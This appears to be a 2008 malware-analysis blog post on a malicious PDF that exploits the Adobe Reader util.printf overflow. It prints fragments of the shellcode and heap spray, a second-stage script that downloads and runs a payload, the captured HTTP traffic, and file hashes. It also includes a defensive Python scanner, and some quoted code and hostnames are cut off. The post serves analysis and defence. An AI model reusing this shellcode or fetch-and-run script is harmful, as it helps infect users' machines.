Wednesday, November 12, 2008

CVE-2008-2992 Adobe PDF Exploitation

On 7 November 2008, SANS reported active exploitation of a stack buffer overflow in the util.printf() JavaScript function of Adobe Reader and Acrobat (CVE-2008-2992). The flaw may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system by way of a crafted PDF. CORE Security Technologies first reported the vulnerability to Adobe in May 2008. Adobe released Adobe Reader and Acrobat 8.1.3 on 4 November 2008 to address it (APSB08-19); public exploit code appeared on 7 November 2008. Because the trigger is a JavaScript call, disabling JavaScript in Reader blocks this class of sample on unpatched versions, although patching is the real fix. The following analyzes a malicious PDF sample.

Exploit Analysis:

The site hosted the malicious PDF file data.pdf (hxxp:// The domain is controlled by five name servers at Dynamic DNS (DDNS) allows individuals to create a hostname that points to their dynamic or static IP address or to a URL. DynDNS also provides an update mechanism that keeps the hostname pointed at a changing IP address.

At the time of exploit, resolved to located in the Netherlands.

inetnum: -
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
remarks: Please send email to mailto:"" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
mnt-by: OCOM-MNT
source: RIPE # Filtered

The IP currently maps to 19 domains.



The malicious PDF file includes objects that contain document-level JavaScript.

00000581 00000581 0 24 0 obj
0000058A 0000058A 0 <</JavaScript 25 0 R>>
000005A1 000005A1 0 endobj
000005A8 000005A8 0 25 0 obj
000005B1 000005B1 0 <</Names[(main)26 0 R]>>
000005CA 000005CA 0 endobj
000005D1 000005D1 0 26 0 obj
000005DA 000005DA 0 <</S/JavaScript/JS 27 0 R>>
000005F6 000005F6 0 endobj
000005FD 000005FD 0 27 0 obj
00000606 00000606 0 <</Length 1257/Filter[/FlateDecode]>>stream
00000636 00000636 0 W[k+7
00000667 00000667 0 Ms(l6
00000799 00000799 0 Gs~tx
0000086E 0000086E 0 8U7n
0000091B 0000091B 0 l+Vi5
0000096B 0000096B 0 o :[hx
00000B1E 00000B1E 0 endstream
00000B28 00000B28 0 endobj
00000B2F 00000B2F 0 28 0 obj

Inflating the FlateDecode stream (object 27) yields obfuscated JavaScript; decoding its %u-escaped strings reveals the shellcode (sccs) and a heap-spray block (bgbl) built from repeated 0x0A0A words.

var sccs = unescape(""+"%"+"u03eb%u"+"eb59%ue805%uf"+"ff8%uffff%u4949%u4949%u494"+"9%u4937

var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length <
fblk = bgbl.substring(0,slspc);
blk = bgbl.substring(0,bgbl.length
blk = blk
mmy = new
i = 0; nm = 12;
i = 0; nm = nm
i = 0; nm = nm
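The object chain above (24 -> 25 -> 26 -> 27) and the unescape()'d strings can be checked automatically rather than by hand. The following Python triage script is an added example, not code from the original post: it builds a constructed PDF that mirrors the sample's object layout, inflates the FlateDecode stream, undoes the `"..."+"..."` string splitting, decodes the %u sequences into the bytes Reader would place in memory, and flags util.printf use and the leading jmp/pop/call GetPC stub. The PDF bytes and the JavaScript inside them are constructed; only the quoted %u prefix of sccs and the 0x0A0A bgbl value come from the sample, and the util.printf line is a placeholder because the sample's real trigger arguments are not shown above.

```python
import re
import struct
import zlib

# Constructed JavaScript standing in for the inflated object 27 stream. The sccs
# prefix and bgbl are quoted from the sample; the util.printf line is a placeholder.
SAMPLE_JS = r'''var sccs = unescape(""+"%"+"u03eb%u"+"eb59%ue805%uf"+"ff8%uffff%u4949%u4949%u494"+"9%u4937");
var bgbl = unescape("%u0A0A"+"%u0A0A");
util.printf(fmt, num); // constructed placeholder; the sample's real trigger arguments are not shown above
'''

# jmp +3 / pop ecx / jmp +5 / call -8: a common GetPC stub that precedes an encoded payload.
GETPC_STUB = bytes.fromhex("eb0359eb05e8f8ffffff")

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\s*(.*?)\s*endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
UNESCAPE_RE = re.compile(r'unescape\(\s*"((?:%u[0-9A-Fa-f]{4})+)"\s*\)')


def build_pdf(js: str) -> bytes:
    """Build a minimal, constructed PDF mirroring the sample's object chain:
    catalog -> 24 /JavaScript -> 25 /Names -> 26 action -> 27 FlateDecode stream.
    No xref table is emitted; the scanner below does not need one, and real
    malicious files are frequently malformed in the same way."""
    stream = zlib.compress(js.encode("latin-1"))
    objs = {
        1: b"<</Type/Catalog/Pages 2 0 R/Names 24 0 R>>",
        2: b"<</Type/Pages/Kids[]/Count 0>>",
        24: b"<</JavaScript 25 0 R>>",
        25: b"<</Names[(main)26 0 R]>>",
        26: b"<</S/JavaScript/JS 27 0 R>>",
        27: b"<</Length %d/Filter[/FlateDecode]>>stream\n" % len(stream) + stream + b"\nendstream",
    }
    body = b"".join(b"%d 0 obj\n%s\nendobj\n" % (n, o) for n, o in objs.items())
    return b"%PDF-1.4\n" + body + b"trailer\n<</Root 1 0 R>>\n%%EOF\n"


def join_string_concats(js: str) -> str:
    """Undo the ""+"%"+"u03eb" splitting so each %u sequence is contiguous."""
    return re.sub(r'"\s*\+\s*"', "", js)


def decode_unicode_escape(s: str) -> bytes:
    """JavaScript unescape('%uXXXX') yields UTF-16 code units; shellcode written this
    way relies on each unit landing in memory as two little-endian bytes."""
    return b"".join(struct.pack("<H", int(h, 16)) for h in re.findall(r"%u([0-9A-Fa-f]{4})", s))


def inflate_stream(obj_body: bytes):
    """Return an object's decoded stream contents, or None if it has no stream."""
    m = STREAM_RE.search(obj_body)
    if not m:
        return None
    raw = m.group(1)
    if b"/FlateDecode" in obj_body.split(b"stream", 1)[0]:
        raw = zlib.decompress(raw)
    return raw


def scan_pdf(data: bytes) -> dict:
    """Walk every object; report JS-bearing dictionaries, util.printf use,
    decoded %u blobs and whether a blob starts with the GetPC stub."""
    report = {"js_objects": [], "util_printf": False, "blobs": [],
              "getpc_stub": False, "bad_streams": []}
    for m in OBJ_RE.finditer(data):
        num, body = int(m.group(1)), m.group(2)
        dict_part = body.split(b"stream", 1)[0]
        if b"/JavaScript" in dict_part or b"/JS" in dict_part:
            report["js_objects"].append(num)
        try:
            content = inflate_stream(body)
        except zlib.error:
            report["bad_streams"].append(num)  # truncated or deliberately corrupt stream
            continue
        if content is None:
            continue
        js = join_string_concats(content.decode("latin-1"))
        if "util.printf" in js:
            report["util_printf"] = True
        for esc in UNESCAPE_RE.findall(js):
            blob = decode_unicode_escape(esc)
            report["blobs"].append(blob)
            if blob.startswith(GETPC_STUB):
                report["getpc_stub"] = True
    return report


if __name__ == "__main__":
    rep = scan_pdf(build_pdf(SAMPLE_JS))
    print("JS objects:", rep["js_objects"], "util.printf:", rep["util_printf"])
    for blob in rep["blobs"]:
        print(len(blob), "bytes:", blob[:16].hex())
```

On the constructed file the scanner reports objects 24 and 26 as JavaScript-bearing, finds util.printf, and decodes the first blob to eb 03 59 eb 05 e8 f8 ff ff ff 49 49 ..., the GetPC stub followed by the start of the "I"-heavy encoded payload; the second blob is the four-byte 0x0A0A0A0A spray word.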

The shellcode execution results in a GET request for hxxp:// The domain is hosted at (same IP as

The request returns obfuscated JavaScript. The image reference for hxxp:// is for tracking purposes.

The decoded script reveals a redirect to

var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){} }

if(xobj) {
    xobj.open("GET", "/code/srun.php?req", false);   // synchronous request to the same host
    xobj.setRequestHeader("Request", "srun");        // custom header seen in the captured traffic below
    xobj.send(null);                                 // issue the request
    response = xobj.responseText;

    if(response.length) {
        dec(asas(response), "s", 2);                 // decode and run the returned payload (dec/asas are defined elsewhere in the script)
    } else {
        self.moveTo(3000, 3000);                     // push the window off-screen
        self.opener = "opener";
    }
}

The request returns content for additional binary downloads.

GET /code/srun.php?req HTTP/1.1
request: srun

Six minutes later, a GET request for occurred. Additional hex-encoded binaries were downloaded over an 8-minute period. Note the user-agent (WinHttp.WinHttpRequest.5), which identifies the COM WinHTTP client used from script rather than a browser, and the same Request: srun header.

GET /get.php?src=xpre HTTP/1.1
Request: srun
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32;WinHttp.WinHttpRequest.5)


The following is an additional request that lacked the WinHttp.WinHttpRequest.5 user-agent.

GET /code/const.php HTTP/1.1

The downloaded malware installs a variety of crapware (rogue security products, adware, etc.). Hashes and sizes of the sample PDF and the dropped binaries:

Filename       MD5                               Size (bytes)
data.pdf       84bc91579cd4dbee7faf3ee09c4a9a4b  10179
prun.exe       d7512e025c439d8454a742992229770c  34816
rasesnet.exe   423d4daf5374710d4498ed917f44b92a  135168
searsnet.exe   18bd892d291f21f14e660537112bb81c  65024
snapsnet.exe   637146739c0dc4c078e0654e6d77eda1  112378
wavvsnet.exe   602b54e018fe9b226ebf8fd5ebaff09c  40014
winvsnet.exe   279ce5af3638a2ba1fde073bbe73a0c5  54784
xpre.exe       1d032fbc6d6884903fa92889f99fc180  745472
